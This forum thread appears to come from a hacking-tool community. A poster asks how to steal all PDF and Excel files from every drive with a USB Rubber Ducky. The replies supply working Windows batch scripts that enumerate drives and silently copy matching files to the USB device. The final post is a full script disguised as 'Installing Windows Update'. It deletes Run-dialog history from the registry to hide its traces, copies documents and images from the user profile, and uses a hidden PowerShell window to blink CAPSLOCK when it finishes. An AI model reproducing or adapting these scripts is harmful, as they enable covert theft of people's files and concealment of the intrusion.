Jump to content

Recommended Posts

Posted

In Hak5's blog post about stealing files with the USB Rubber Ducky, they only targeted the documents folder on the C: drive. I'm looking to steal all .PDFs/Excel spreadsheet, regardless of their directory/drive. Can anyone show me how this is done? I have been trying all day now, but can't get a satisfactory result. 

Thanks in advance! Any help would be greatly appreciated.

Posted

There are probably a few ways to do this.
Code below is untested on a ducky

REM Get all drive letters, skips name lable
FOR /F "skip=1" %%A IN ('wmic logicaldisk get name') DO (
REM Check drive is not the ducky  
IF %%~dA NEQ %~d0 (
REM COPY FILE
xcopy /C /Q /G /Y /S %%A\*.pdf %dst% >>nul
)
)

or

REM Get all drive letters, skips name lable
FOR /F "skip=1" %%A IN ('wmic logicaldisk get name') DO (
REM Check drive is not the ducky  
IF %%~dA NEQ %~d0 (
REM Call dir on each drive letter find files ending in .pdf or .xlsx
FOR /F "delims==" %%I IN ('dir %%A\ /s /b /a-d ^| findstr /ile ".pdf .xlsx"') DO (
REM COPY FILE
xcopy /C /Q /G /Y %%I %dst% >>nul
)
)
)

Hope this helps

Posted

Cribbit has a good point, but this will take forever though.
If you have limited time to extract you could consider using %homepath% to see where Windows stores files by default. In most company GPO's this will be directed to some network drive.
%temp% could have interesting stuff as well.


Cheers.

Posted

Need help here.. It will steal all pdf, doc, docx, jpeg, jpg from %USERPROFILE ?

e.cmd

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul

REM Same as above but does not create empty directories
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.doc %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.docx %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.jpg %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.jpeg %dst% >>nul
)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...